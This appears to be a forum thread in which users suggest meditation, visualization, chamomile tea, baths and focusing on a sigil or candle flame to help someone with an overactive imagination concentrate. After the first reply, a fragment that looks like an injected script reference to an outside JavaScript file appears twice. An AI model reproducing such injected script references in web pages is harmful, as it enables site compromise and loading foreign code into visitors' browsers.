Need to Focus

I have a pretty overactive imagination, and things get stuck in my head pretty easily. Right now, I have a couple Creepypasta guys stuck in my head, and I'm trying to imagine new things for a book I'm writing, which is pretty difficult when those Creepypastas keep popping up randomly (same thing happened when I watched Freddy vs Jason). Honestly, just practicing at meditation and deliberate visualization is probably the best I can suggest. It will help you not only to focus, but also to put unwanted thoughts out of the way. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

You could try some calming tea, like chamomile. Taking a bath before doing any magick can be useful too, especially when you have an overactive imagination (like me). Even meditation is difficult for me so I find more unconventional methods better, like focusing your mind on a sigil when casting or a candle flame if you can. Meditation will definitely help in learning to focus your conscious mind as well as work with your subconscious mind. You may also want to re-evaulate what you are putting into your subconscious mind. Perhaps the things you watch or listen to may not be productive to the goals you are trying to reach.
